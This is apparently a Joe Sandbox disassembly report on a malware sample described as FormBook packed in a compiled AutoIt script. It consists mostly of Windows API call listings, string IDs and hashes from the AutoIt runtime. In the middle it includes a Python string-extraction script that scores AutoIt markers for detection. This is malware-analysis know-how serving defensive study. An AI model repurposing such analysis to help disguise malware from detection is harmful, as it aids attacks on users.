                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                  • String ID: ($0$tooltips_class32
                                                                  • API String ID: 698492251-4156429822
                                                                  • Opcode ID: 0574aa510f4af71d79693ac76ca91a117a239278486f974f4b9b47b86722447c
                                                                  • Instruction ID: 38a451cd65c08e586c0054fe81f73cbf214fcabcb22b715d45bbf698a50ee7d3
                                                                  • Opcode Fuzzy Hash: 0574aa510f4af71d79693ac76ca91a117a239278486f974f4b9b47b86722447c
                                                                  • Instruction Fuzzy Hash: 44B15A72608350AFDB04DF68C848B6ABBE4FB84714F008918F59DAB2A2D771EC45CB56
                                                                  APIs
                                                                  • GetFileVersionInfoSizeW.VERSION(?,?), ref: 009544AC
                                                                  • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 009544D2
                                                                  • _wcscpy.LIBCMT ref: 00954500
                                                                  • _wcscmp.LIBCMT ref: 0095450B
                                                                  • _wcscat.LIBCMT ref: 00954521
                                                                  • _wcsstr.LIBCMT ref: 0095452C
                                                                  • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00954548
                                                                  • _wcscat.LIBCMT ref: 00954591
                                                                  • _wcscat.LIBCMT ref: 00954598
                                                                  • _wcsncpy.LIBCMT ref: 009545C3
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                                                  • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                  • API String ID: 699586101-1459072770
                                                                  • Opcode ID: cba1e78b0c1228377a91d4bc06ac1978b0ba3151ceb91a5594346d27b18137a4
                                                                  • Instruction ID: 3cc4bf488158c2b7c4d42903bb69e40c66db7ee182ceae1d3d17b768102508fc
                                                                  • Opcode Fuzzy Hash: cba1e78b0c1228377a91d4bc06ac1978b0ba3151ceb91a5594346d27b18137a4
                                                                  • Instruction Fuzzy Hash: 7041F632A002087AEB14EB75DC07FFF77ACDFC6714F004466F908A6182FA759A9197A5
                                                                  APIs
                                                                  • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 008F28BC
                                                                  • GetSystemMetrics.USER32(00000007), ref: 008F28C4
                                                                  • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 008F28EF
                                                                  • GetSystemMetrics.USER32(00000008), ref: 008F28F7
                                                                  • GetSystemMetrics.USER32(00000004), ref: 008F291C
                                                                  • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 008F2939
                                                                  • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 008F2949
                                                                  • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 008F297C
                                                                  • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 008F2990
                                                                  • GetClientRect.USER32(00000000,000000FF), ref: 008F29AE
                                                                  • GetStockObject.GDI32(00000011), ref: 008F29CA
                                                                  • SendMessageW.USER32(00000000,00000030,00000000), ref: 008F29D5
                                                                    • Part of subcall function 008F2344: GetCursorPos.USER32(?), ref: 008F2357
                                                                    • Part of subcall function 008F2344: ScreenToClient.USER32(009B57B0,?), ref: 008F2374
                                                                    • Part of subcall function 008F2344: GetAsyncKeyState.USER32(00000001), ref: 008F2399
                                                                    • Part of subcall function 008F2344: GetAsyncKeyState.USER32(00000002), ref: 008F23A7
                                                                  • SetTimer.USER32(00000000,00000000,00000028,008F1256), ref: 008F29FC
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                  • String ID: AutoIt v3 GUI
                                                                  • API String ID: 1458621304-248962490
                                                                  • Opcode ID: 52a41b345509e3143c0282b4fad00aa69b8710f3b8620b33e896e175bd954027
                                                                  • Instruction ID: bf0dc746aa58199e3b7fa603fd558b6333778abc91f6a2f6315a7474aa9f484c
                                                                  • Opcode Fuzzy Hash: 52a41b345509e3143c0282b4fad00aa69b8710f3b8620b33e896e175bd954027
                                                                  • Instruction Fuzzy Hash: 03B19C71A1420AEFDB14DFA8DD95BBE7BB5FB08310F104229FA15E72A0DB74A850DB50
                                                                  APIs
                                                                  • GetClassNameW.USER32(?,?,00000100), ref: 0094A47A
                                                                  • __swprintf.LIBCMT ref: 0094A51B
                                                                  • _wcscmp.LIBCMT ref: 0094A52E
                                                                  • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 0094A583
                                                                  • _wcscmp.LIBCMT ref: 0094A5BF
                                                                  • GetClassNameW.USER32(?,?,00000400), ref: 0094A5F6
                                                                  • GetDlgCtrlID.USER32(?), ref: 0094A648
                                                                  • GetWindowRect.USER32(?,?), ref: 0094A67E
                                                                  • GetParent.USER32(?), ref: 0094A69C
                                                                  • ScreenToClient.USER32(00000000), ref: 0094A6A3
                                                                  • GetClassNameW.USER32(?,?,00000100), ref: 0094A71D
                                                                  • _wcscmp.LIBCMT ref: 0094A731
                                                                  • GetWindowTextW.USER32(?,?,00000400), ref: 0094A757
                                                                  • _wcscmp.LIBCMT ref: 0094A76B
                                                                    • Part of subcall function 0091362C: _iswctype.LIBCMT ref: 00913634
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                                                                  • String ID: %s%u
                                                                  • API String ID: 3744389584-679674701
                                                                  • Opcode ID: cba9b97284c52d0361b03be4d6129c738696ac52b220f02661d8c29edb1344d8
                                                                  • Instruction ID: b98058edb9046261738bc9f87dd5c6995f1d7bc8898b2273899cd2cce1a4d447
                                                                  • Opcode Fuzzy Hash: cba9b97284c52d0361b03be4d6129c738696ac52b220f02661d8c29edb1344d8
                                                                  • Instruction Fuzzy Hash: 8BA1D071644306AFDB29DF60C884FAAB7ECFF84354F008629F999D2190DB34E945CB92
                                                                  APIs
                                                                  • GetClassNameW.USER32(00000008,?,00000400), ref: 0094AF18
                                                                  • _wcscmp.LIBCMT ref: 0094AF29
                                                                  • GetWindowTextW.USER32(00000001,?,00000400), ref: 0094AF51
                                                                  • CharUpperBuffW.USER32(?,00000000), ref: 0094AF6E
                                                                  • _wcscmp.LIBCMT ref: 0094AF8C
                                                                  • _wcsstr.LIBCMT ref: 0094AF9D
                                                                  • GetClassNameW.USER32(00000018,?,00000400), ref: 0094AFD5
                                                                  • _wcscmp.LIBCMT ref: 0094AFE5
                                                                  • GetWindowTextW.USER32(00000002,?,00000400), ref: 0094B00C
                                                                  • GetClassNameW.USER32(00000018,?,00000400), ref: 0094B055
                                                                  • _wcscmp.LIBCMT ref: 0094B065
                                                                  • GetClassNameW.USER32(00000010,?,00000400), ref: 0094B08D
                                                                  • GetWindowRect.USER32(00000004,?), ref: 0094B0F6
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                                  • String ID: @$ThumbnailClass
                                                                  • API String ID: 1788623398-1539354611
                                                                  • Opcode ID: 4faee55aa6f6cb1c45b2fd5fe4c93f8d4a4c48baecfd99c6a7d353bb600fb134
                                                                  • Instruction ID: b20017b318574e47736bc9c41ee6c81a04ba61f6ca95219b8c0ab4dafd6788f1
                                                                  • Opcode Fuzzy Hash: 4faee55aa6f6cb1c45b2fd5fe4c93f8d4a4c48baecfd99c6a7d353bb600fb134
                                                                  • Instruction Fuzzy Hash: 0A81A1721082099FDB05DF14C891FAA7BECFF84714F048469FD899A095DB34DD89CB61
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: __wcsnicmp
                                                                  • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                                  • API String ID: 1038674560-1810252412
                                                                  • Opcode ID: 8fbb265e90a2d5e1b93f26cf61b0ce93db5d9dbff8b6afec40be7f152475be37
                                                                  • Instruction ID: dd9903a6e4858283c4d945ff5e9c7759cfc63477e03560846612140964686644
                                                                  • Opcode Fuzzy Hash: 8fbb265e90a2d5e1b93f26cf61b0ce93db5d9dbff8b6afec40be7f152475be37
                                                                  • Instruction Fuzzy Hash: F9319031A8820DBAEB14FBB4DE43FFEB768AB61715F600419B552B10D1EE616F04C692
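The `AutoIt v3 GUI` window class passed to CreateWindowExW at 008F297C and the window-description keywords compared by the `__wcsnicmp` function above (`[CLASS:`, `[HANDLE:`, `[REGEXPTITLE:`, `[ACTIVE`, `[LAST`, `CLASSNAME=`, `REGEXP=`) belong to the AutoIt3 runtime that wraps this sample rather than to the FormBook payload it unpacks, which is why the report classes the binary as a compiled AutoIt script. The Python below is an added example and is not part of the Joe Sandbox report: it pulls ASCII and UTF-16LE strings out of a file image and scores the markers seen in this section. The marker weights and the decision threshold are assumptions chosen for illustration, and the two sample images are constructed inline, not bytes from the analysed file.

```python
"""Score compiled-AutoIt runtime markers in a file image's strings.

Added example, not part of the Joe Sandbox report. MARKERS are strings that
appear in this report's API listings; their weights and the threshold are
assumptions chosen for illustration.
"""
import re

MARKERS = {
    "AutoIt v3 GUI": 3,   # window class passed to CreateWindowExW at 008F297C
    "[REGEXPTITLE:": 2,   # advanced window-description keywords seen in __wcsnicmp
    "[CLASS:": 1,
    "[HANDLE:": 1,
    "[ACTIVE": 1,
    "[LAST": 1,
    "CLASSNAME=": 1,
    "REGEXP=": 1,
}

# Runs of five or more printable ASCII characters, narrow and UTF-16LE.
ASCII_RE = re.compile(rb"[\x20-\x7e]{5,}")
WIDE_RE = re.compile(rb"(?:[\x20-\x7e]\x00){5,}")


def extract_strings(data):
    """Return printable strings found in data, narrow ones first, then wide."""
    out = [m.group().decode("ascii") for m in ASCII_RE.finditer(data)]
    out += [m.group().decode("utf-16le") for m in WIDE_RE.finditer(data)]
    return out


def autoit_score(data):
    """Return (weighted score, sorted list of markers hit) for a file image."""
    strings = extract_strings(data)
    hits = sorted(m for m in MARKERS if any(m in s for s in strings))
    return sum(MARKERS[m] for m in hits), hits


def looks_like_autoit(data, threshold=4):
    """True when the weighted marker score reaches the (assumed) threshold."""
    score, _ = autoit_score(data)
    return score >= threshold


def _wide(s):
    """NUL-terminated UTF-16LE string, as the W-suffixed APIs above expect."""
    return s.encode("utf-16le") + b"\x00\x00"


# Constructed sample images, not bytes from the analysed file.
POSITIVE_SAMPLE = (b"MZ" + b"\x00" * 16 + _wide("AutoIt v3 GUI") + _wide("[CLASS:")
                   + _wide("[REGEXPTITLE:") + _wide("[LAST") + b"tooltips_class32\x00")
NEGATIVE_SAMPLE = b"MZ" + b"\x00" * 16 + _wide("tooltips_class32") + b"Hello World\x00"

if __name__ == "__main__":
    for label, image in (("positive", POSITIVE_SAMPLE), ("negative", NEGATIVE_SAMPLE)):
        score, hits = autoit_score(image)
        print(label, score, hits, looks_like_autoit(image))
```

The wide-string pass matters here: the runtime passes these literals to `...W` functions, so in the binary they are stored as UTF-16LE and a narrow-only `strings` run would miss them. `tooltips_class32` is deliberately not a marker, since any program using the common-controls tooltip creates that class.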
APIs
• LoadCursorW.USER32(00000000,00007F8A), ref: 00965013
• LoadCursorW.USER32(00000000,00007F00), ref: 0096501E
• LoadCursorW.USER32(00000000,00007F03), ref: 00965029
• LoadCursorW.USER32(00000000,00007F8B), ref: 00965034
• LoadCursorW.USER32(00000000,00007F01), ref: 0096503F
• LoadCursorW.USER32(00000000,00007F81), ref: 0096504A
• LoadCursorW.USER32(00000000,00007F88), ref: 00965055
• LoadCursorW.USER32(00000000,00007F80), ref: 00965060
• LoadCursorW.USER32(00000000,00007F86), ref: 0096506B
• LoadCursorW.USER32(00000000,00007F83), ref: 00965076
• LoadCursorW.USER32(00000000,00007F85), ref: 00965081
• LoadCursorW.USER32(00000000,00007F82), ref: 0096508C
• LoadCursorW.USER32(00000000,00007F84), ref: 00965097
• LoadCursorW.USER32(00000000,00007F04), ref: 009650A2
• LoadCursorW.USER32(00000000,00007F02), ref: 009650AD
• LoadCursorW.USER32(00000000,00007F89), ref: 009650B8
• GetCursorInfo.USER32(?), ref: 009650C8
Memory Dump Source
• Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
• Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
Similarity
• API ID: Cursor$Load$Info
• String ID:
• API String ID: 2577412497-0
APIs
• _memset.LIBCMT ref: 0097A259
• DestroyWindow.USER32(?,?), ref: 0097A2D3
  • Part of subcall function 008F7BCC: _memmove.LIBCMT ref: 008F7C06
• CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0097A34D
• SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0097A36F
• SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0097A382
• DestroyWindow.USER32(00000000), ref: 0097A3A4
• CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,008F0000,00000000), ref: 0097A3DB
• SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0097A3F4
• GetDesktopWindow.USER32 ref: 0097A40D
• GetWindowRect.USER32(00000000), ref: 0097A414
• SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0097A42C
• SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0097A444
  • Part of subcall function 008F25DB: GetWindowLongW.USER32(?,000000EB), ref: 008F25EC
Similarity
• API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
• String ID: 0$tooltips_class32
• API String ID: 1297703922-3619404913
APIs
  • Part of subcall function 008F2612: GetWindowLongW.USER32(?,000000EB), ref: 008F2623
• DragQueryPoint.SHELL32(?,?), ref: 0097C627
  • Part of subcall function 0097AB37: ClientToScreen.USER32(?,?), ref: 0097AB60
  • Part of subcall function 0097AB37: GetWindowRect.USER32(?,?), ref: 0097ABD6
  • Part of subcall function 0097AB37: PtInRect.USER32(?,?,0097C014), ref: 0097ABE6
• SendMessageW.USER32(?,000000B0,?,?), ref: 0097C690
• DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0097C69B
• DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0097C6BE
• _wcscat.LIBCMT ref: 0097C6EE
• SendMessageW.USER32(?,000000C2,00000001,?), ref: 0097C705
• SendMessageW.USER32(?,000000B0,?,?), ref: 0097C71E
• SendMessageW.USER32(?,000000B1,?,?), ref: 0097C735
• SendMessageW.USER32(?,000000B1,?,?), ref: 0097C757
• DragFinish.SHELL32(?), ref: 0097C75E
• DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0097C851
Similarity
• API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
• String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
• API String ID: 169749273-3440237614
APIs
• CharUpperBuffW.USER32(?,?), ref: 00974424
• SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0097446F
Similarity
• API ID: BuffCharMessageSendUpper
• String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
• API String ID: 3974292440-4258414348
APIs
• LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 0097B8B4
• LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,009791C2), ref: 0097B910
• LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0097B949
• LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 0097B98C
• LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0097B9C3
• FreeLibrary.KERNEL32(?), ref: 0097B9CF
• ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0097B9DF
• DestroyIcon.USER32(?,?,?,?,?,009791C2), ref: 0097B9EE
• SendMessageW.USER32(?,00000170,00000000,00000000), ref: 0097BA0B
• SendMessageW.USER32(?,00000064,00000172,00000001), ref: 0097BA17
  • Part of subcall function 00912EFD: __wcsicmp_l.LIBCMT ref: 00912F86
Similarity
• API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
• String ID: .dll$.exe$.icl
• API String ID: 1212759294-1154884017
APIs
• GetLocalTime.KERNEL32(?), ref: 0095DCDC
• SystemTimeToFileTime.KERNEL32(?,?), ref: 0095DCEC
• LocalFileTimeToFileTime.KERNEL32(?,?), ref: 0095DCF8
• __wsplitpath.LIBCMT ref: 0095DD56
• _wcscat.LIBCMT ref: 0095DD6E
• _wcscat.LIBCMT ref: 0095DD80
• GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0095DD95
• SetCurrentDirectoryW.KERNEL32(?), ref: 0095DDA9
• SetCurrentDirectoryW.KERNEL32(?), ref: 0095DDDB
• SetCurrentDirectoryW.KERNEL32(?), ref: 0095DDFC
• _wcscpy.LIBCMT ref: 0095DE08
• SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 0095DE47
Similarity
• API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
• String ID: *.*
• API String ID: 3566783562-438819550
APIs
• LoadStringW.USER32(00000066,?,00000FFF,00000016), ref: 00959C7F
  • Part of subcall function 008F7DE1: _memmove.LIBCMT ref: 008F7E22
• LoadStringW.USER32(00000072,?,00000FFF,?), ref: 00959CA0
• __swprintf.LIBCMT ref: 00959CF9
• __swprintf.LIBCMT ref: 00959D12
• _wprintf.LIBCMT ref: 00959DB9
• _wprintf.LIBCMT ref: 00959DD7
Similarity
• API ID: LoadString__swprintf_wprintf$_memmove
• String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
• API String ID: 311963372-3080491070
APIs
  • Part of subcall function 008F9837: __itow.LIBCMT ref: 008F9862
  • Part of subcall function 008F9837: __swprintf.LIBCMT ref: 008F98AC
• CharLowerBuffW.USER32(?,?), ref: 0095A3CB
• GetDriveTypeW.KERNEL32 ref: 0095A418
• mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0095A460
• mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0095A497
• mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0095A4C5
  • Part of subcall function 008F7BCC: _memmove.LIBCMT ref: 008F7C06
Similarity
• API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
• String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
• API String ID: 2698844021-4113822522
APIs
• GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,00000000,?,0092E029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000), ref: 0094F8DF
• LoadStringW.USER32(00000000,?,0092E029,00000001), ref: 0094F8E8
  • Part of subcall function 008F7DE1: _memmove.LIBCMT ref: 008F7E22
• GetModuleHandleW.KERNEL32(00000000,009B5310,?,00000FFF,?,?,0092E029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000,00000001), ref: 0094F90A
• LoadStringW.USER32(00000000,?,0092E029,00000001), ref: 0094F90D
• __swprintf.LIBCMT ref: 0094F95D
• __swprintf.LIBCMT ref: 0094F96E
• _wprintf.LIBCMT ref: 0094FA17
• MessageBoxW.USER32(00000000,?,?,00011010), ref: 0094FA2E
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
                                                                  • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                  • API String ID: 984253442-2268648507
                                                                  • Opcode ID: b7b9fc8a40293c77a794f14263aa51a73b574da471d9833c4bf8bb964c031cbd
                                                                  • Instruction ID: 790a1e61c4787c2fa681d73ff88aa7c08d3e194a8894797ac5f709817b85e66a
                                                                  • Opcode Fuzzy Hash: b7b9fc8a40293c77a794f14263aa51a73b574da471d9833c4bf8bb964c031cbd
                                                                  • Instruction Fuzzy Hash: 6F415B7290410DAADB04FBE4DD96EFE7778EF54300F500065B605B2091EA356F49CB62
                                                                  APIs
                                                                  • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00979207,?,?), ref: 0097BA56
                                                                  • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00979207,?,?,00000000,?), ref: 0097BA6D
                                                                  • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00979207,?,?,00000000,?), ref: 0097BA78
                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,00979207,?,?,00000000,?), ref: 0097BA85
                                                                  • GlobalLock.KERNEL32(00000000), ref: 0097BA8E
                                                                  • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,00979207,?,?,00000000,?), ref: 0097BA9D
                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 0097BAA6
                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,00979207,?,?,00000000,?), ref: 0097BAAD
                                                                  • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00979207,?,?,00000000,?), ref: 0097BABE
                                                                  • OleLoadPicture.OLEAUT32(?,00000000,00000000,00982CAC,?), ref: 0097BAD7
                                                                  • GlobalFree.KERNEL32(00000000), ref: 0097BAE7
                                                                  • GetObjectW.GDI32(00000000,00000018,?), ref: 0097BB0B
                                                                  • CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 0097BB36
                                                                  • DeleteObject.GDI32(00000000), ref: 0097BB5E
                                                                  • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 0097BB74
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                  • String ID:
                                                                  • API String ID: 3840717409-0
                                                                  • Opcode ID: 022997ebf65a0600b689af94d6c681458d9c2cde6c74b24a6dd3423c0fac722c
                                                                  • Instruction ID: 4447810d1bc703ba1f0cac6db9c6ccccc2cf8dd945b77b2d61e25b6ef77e1708
                                                                  • Opcode Fuzzy Hash: 022997ebf65a0600b689af94d6c681458d9c2cde6c74b24a6dd3423c0fac722c
                                                                  • Instruction Fuzzy Hash: B3413976604208EFDB119F65DC98EAABBBCFF89B15F108068F909E7260D7309D41DB60
                                                                  APIs
                                                                  • __wsplitpath.LIBCMT ref: 0095DA10
                                                                  • _wcscat.LIBCMT ref: 0095DA28
                                                                  • _wcscat.LIBCMT ref: 0095DA3A
                                                                  • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0095DA4F
                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 0095DA63
                                                                  • GetFileAttributesW.KERNEL32(?), ref: 0095DA7B
                                                                  • SetFileAttributesW.KERNEL32(?,00000000), ref: 0095DA95
                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 0095DAA7
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
